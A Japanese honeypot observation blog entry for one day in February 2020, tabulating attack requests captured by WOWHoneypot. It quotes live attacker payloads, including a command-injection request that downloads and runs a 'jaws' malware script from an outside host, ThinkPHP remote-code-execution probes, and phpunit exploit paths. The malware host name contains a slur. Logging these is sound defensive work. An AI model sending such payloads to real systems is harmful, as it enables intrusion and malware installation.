23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(334日目)

2020/02/15(土)

トータルは167件でした。

ハンティングログは以下です。

42.115.53.222 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
91 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
45 アクセス GET /
6 調査 GET /script
2 phpMyAdminの調査 GET /phpmyadmin/index.php
2 phpMyAdminの調査 GET /phpMyAdmin/index.php
2 Webshell設置の調査 GET /ab178b72f07ad856e8662cb2fb793ab7.php
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 Webshell設置の調査 GET /585f9eb3350f175be5cea2e9258772a4.php
2 Webshell設置の調査 GET /048F246A2631A86BCCD05508D05F5418.php
1 phpunit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 MVPower DVRなどの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws
1 調査 GET /login
1 調査 GET /is_test
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 不正中継の試み CONNECT ip.ws.126.net:443